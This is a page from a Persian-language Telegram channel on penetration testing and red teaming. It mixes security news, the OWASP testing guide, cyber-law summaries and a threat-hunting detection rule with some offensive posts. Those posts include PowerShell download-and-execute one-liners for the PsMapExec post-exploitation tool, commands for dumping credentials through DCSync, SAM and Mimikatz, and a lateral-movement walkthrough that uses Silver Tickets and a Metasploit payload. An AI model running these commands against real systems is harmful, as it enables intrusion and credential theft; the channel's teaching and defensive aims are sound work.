اکنون در دسترس! پژوهش تلگرام ۲۰۲۵ — مهمترین بینشهای سال 
Try Hack Box
رفتن به کانال در Telegram
1 Nov 2020 1399/08/11 آموزش تست نفوذ و ردتیم https://linkedin.com/company/tryhackbox-org/ یوتیوب https://youtube.com/@tryhackbox کانال ها : @TryHackBoxOfficial ( نقشه راه ) @TryHackBoxStory ( اخبار و داستانهای هک ) پشتیبانی : @ThbxSupport
نمایش بیشتر6 217
مشترکین
اطلاعاتی وجود ندارد24 ساعت
+157 روز
+6230 روز
آرشیو پست ها
6 215
🚀 پروژه جدیدمون رو معرفی میکنم
پروژه و ریپازیتوری ای رو آماده سازی کردیم که کم کم رشد اش بدیم و بتونیم لابراتوار های خانگی با کیفیتی رو با سناریو های آموزشی یا سناریو های واقعی برای حملات xss تداعی کنیم !
به اشتراک گذاشتن تجربه شما در مورد کد ها و ساختار و روند این لابراتوار ها به ما کمک میکنه که بهتر بشیم !
از اجر های کوچیک شروع میکنیم و باهاش یه اسمان خراش میسازیم !🏙🏙
🔗Github
✍️نویسنده
@TryHackBox | The Chaos
6 215
🔖 لینک های پنهان: تحلیل خانواده های مخفی اپلیکیشن های VPN .
💠 در این مقاله، ما حریم خصوصی و امنیت اپلیکیشنهای VPN را که ارائه دهندگان آنها به عمد مالکیت خود را پنهان میکنند، تحلیل میکنیم. ما از روابط پنهان بین ارائه دهندگان VPN که به ظاهر متمایز هستند، به عنوان یک نشانگر غیرمستقیم از رفتار فریبنده استفاده میکنیم. سپس به دنبال مسائل امنیتی خاص VPN در اپلیکیشن های ارائه دهندگان فریبنده هستیم تا نقص های مشترک را کشف کنیم.
@TryHackBox | Github | YouTube | Group
6 215
🛡 راهنمای نهایی تست امنیت وب (WSTG)
📚 معرفی یک مرجع بینظیر برای متخصصان امنیت:
Web Security Testing Guide (WSTG)
جامعترین راهنمای تست امنیت برنامههای تحت وب
✨ مشخصات کتاب:
- ناشر: OWASP Foundation 🏢
- سازمان منتشرکننده: Open Web Application Security Project
- نوع محتوا: راهنمای رایگان و متنباز
- بهروزرسانی: نسخه اخیر (v4.2)
🎯 چه چیزی داخلش پیدا میکنید:
✅ تست احراز هویت و مدیریت نشست
✅ تست کنترل دسترسی
✅ تست تزریق (SQLi, XSS, Command Injection)
✅ تست منطق کسبوکار
✅ تست امنیت API
✅ و دهها فصل تخصصی دیگر...
🚀 چرا WSTG رو دانلود کنم؟
- منبع رسمی OWASP معتبرترین مرجع جهانی
- پوشش کامل چرخه تست امنیتی
✍️نویسنده
@TryHackBox | The Chaos
#WSTG #WebSecurity #OWASP #SecurityTesting
#CyberSecurity
6 215
#سوال
چرا باید هنگام اسکن یک sniffer اجرا کنیم؟
#جواب اخرشب تو همین پست گذاشته می شود .
جواب هاتون کامنت کنید
6 215
🔖 شاخص منابع شناخته شده
ابزاری آنلاین برای اسکن یک وبسایت و پیدا کردن اطلاعات درباره آن:
- robots.txt file - security.txt - ads.txt - assetlinks.json - app-ads.txt - gpc.json و دیگر موارد. https://well-known.dev/ @TryHackBox
6 215
نگاهی به پست های قبل :
راهنمای جامع تزریق پروسس در لینوکس
آزمایش آسیبپذیری آپاچی
چک لیست برای تست نفوذ اندروید
Credential Dumping DCSync Attack
جلسه هفتم دوره رایگان سکوریتی پلاس
واژهنامه امنیت سایبری TryHackBox
Browser Extensions For Bug Bounty
NTLM Relay Attack ?
Secure and insecure ports
PASSWORD CRACKING TOOLS
تزریق پرامپت Exploiting از سردرگمی دستورات LLM
ماه آگاهیبخشی امنیت سایبری
بیایید بیشتر در مورد APT و ..
SDDL | اشکهاتو برای یه روز دیگه نگه دار
بازیابی رمزهای عبور از ترافیک Kerberos کپچر شده
در برخی موارد، مهاجمان ...
دیکشنری های پسورد
تست فایلهای JavaScript در حوزه باگ بانتی
ریورس و تحلیل امنیتی سیستم خانه هوشمند مبتنی بر ESP32
بازی رمز عبور
فایروال دیوار دفاعی شبکه
مقدمات فایروال
بررسی reconnaissance بر پایه LinkedIn
آشنایی با قوانین جرایم سایبری در ایران
آشنایی با قوانین سایبری در سطح بین و المللی
6 215
#سوال
دوستان فکر کنید در یک مصاحبه هستید و ازتون سوال میپرسند :
بزرگترین نقطه قوت شما چیست؟
جواب هاتون کامنت کنید
6 215
امروز برای اولین بار سراغ یک تکنیک کاربردی می ریم که برای شکار تهدید خیلی مفیده
Masquerading: Match Legitimate Resource Name or Location (T1036.005).
مثل همیشه، با یک مثال شروع میکنیم
https://securelist.com/mysterious-elephant-apt-ttps-and-tools/117596/
C:\ProgramData\Intel\ping.exe C:\Users\Public\ping.exeهمانطور که مشاهده میشود، مهاجمان فایلهای مخرب را شبیه ابزارِ معتبر ping جلوه دادهاند. چنین مواردی را میتوان مستند سازی کرد و هم برای تشخیص و هم برای شکار تهدید از آن ها استفاده کرد برای مثال:
event_type: "processcreatewin"
AND
proc_file_path: "ping.exe"
AND NOT
proc_file_path: ("windows\system32" OR "windows\syswow64")
@TryHackBox6 215
⚖ آشنایی با قوانین سایبری در سطح بین و المللی
⭕ بدون شناخت قوانین جهانی امنیت سایبری، هر فعالیت فنی میتونه دردسرساز بشه!
⭕ این فایل شامل خلاصهای از مهمترین قوانین سایبری در اروپا، آمریکا و سایر کشورهاست.
💢 قوانین سایبری فقط مخصوص ایران نیست .
💢 این فایل یه نگاه جهانی داره به قانونهایی که درباره هک، داده، و امنیت سایبری تصویب شدن.
⭕ حتما بخون قبل از هر تست یا پروژه فنی
@TryHackBox
#قوانین_سایبری_بینالمللی #قوانین_سایبری
6 215
اجرای ابزار از حافظه:
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")PsMapExec -Targets All -Method [Method]با پسورد
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]PsMapExec -Targets DC.domain.local -Method SMB -Ticket [Base64-Ticket] -Module SAMPsMapExec -Method Kerberoast -ShowOutput
PsMapExec -Targets All -Method [Method] -Module [Module]6 215
🔖 PsMapExec v0.9.0
یک به روزرسانی برای ابزار post-exploitation در Active Directory که با PowerShell نوشته شده منتشر شد.
به روز رسانی
پشتیبانی از چند دامنه بهبود عملکرد از طریق Proxifier / تونلهای SSH امکان روشن/خاموش کردن RDP ماژولهای جدید: EventCredsماژول های اضافی در LDAP:
GMSA ConstrainedDelegation UnconstrainedDelegation AdminCount ComputerSIDs UserDescriptions UserLogonRestrictions UserPasswords UserSIDsروشها (پروتکل) فعلی که پشتیبانی میشوند:
RDP SessionHunter SMB SMB Signing LDAP / LDAPS SSH Spraying VNC WinRM WMI MSSQL Kerberoastماژول های پیاده سازی شده:
Amnesiac — اجرای payloadهای Amnesiac C2 ConsoleHistory — تاریخچه در PowerShell Files — فایلها در دایرکتوریهای متداول KerbDump — دامپ تیکتهای Kerberos eKeys — دامپ کلیدها (Mimikatz) LogonPasswords — دامپ پسوردهای لاگآن (Mimikatz) LSA — دامپ LSA (Mimikatz) NTDS — پیادهسازی DCsync SAM — دامپ SAMhttps://viperone.gitbook.io/pentest-everything/psmapexec @TryHackBox #PowerShell #pentest #redteam #psmapexec
6 215
⚖ آشنایی با قوانین جرایم سایبری در ایران
💢 اگر در حوزه امنیت سایبری، تست نفوذ یا ردتیم فعالیت میکنی، حتما باید بدونی چه کارهایی جرم محسوب میشن و مجازاتشون چیه.
⭕ یه اشتباه کوچیک در دنیای سایبری میتونه به جرم بزرگ تبدیل بشه!
💢 قبل از هر تست نفوذ یا فعالیت فنی، قوانین سایبری ایران رو بشناس.
@TryHackBox
#قوانین_سایبری
6 215
🔖 grype v0.100.0
اسکنر آسیبپذیری برای containers و فایل سیستم ها
نصب:
curl -sSfL https://get.anchore.io/grype | sudo sh -s -b /usr/local/bingrype scope all-layershttps://github.com/anchore/grype @TryHackBox #grype #soft #golang
6 215
🔖 grype v0.100.0
اسکنر آسیبپذیری برای containers و فایل سیستم ها
نصب:
curl -sSfL https://get.anchore.io/grype | sudo sh -s -b /usr/local/bingrype scope all-layershttps://github.com/anchore/grype @TryHackBox #grype #soft #golang
6 215
Repost from
آماده سازی برای NTLM Relay از راه دور: Lateral Movement بدون NTLM و پورت 445/TCP
این مقاله یک سناریو واقعی از تست نفوذ را نشان میدهد که در آن مهاجم پس از دستیابی به دسترسی اولیه به یک سرور،با غیرفعال کردن عمدی سرویس های حیاتی NetLogon، LanManServer و LanManWorkstation، مسیر معمول NTLM Relay از طریق پورت 445 را مسدود می کند.
مراحل دقیق حمله:
1. غیرفعال کردن سرویسهای حیاتی:
sc stop netlogon sc stop lanmanserver sc config lanmanserver start= disabled sc stop lanmanworkstation sc config lanmanworkstation start= disabled2. تأیید بسته بودن پورت 445:
nmap -p 445 -sT -Pn <serverIP>secretsdump.py
■ به دست آوردن Domain SID با lookupsid.py
■ ساخت Silver Ticket با ticketer.py
4. دسترسی به سیستم تارگت:
■ استفاده از atexec-pro.py برای اجرای دستور از راه دور
■ آپلود و اجرای پیلود (msf_win_x64.exe)
⚠️ سلب مسئولیت:
این محتوا صرفاً برای اهداف آموزشی و در محیط های لابراتور مجاز ارائه می شود.
@KavehAPT
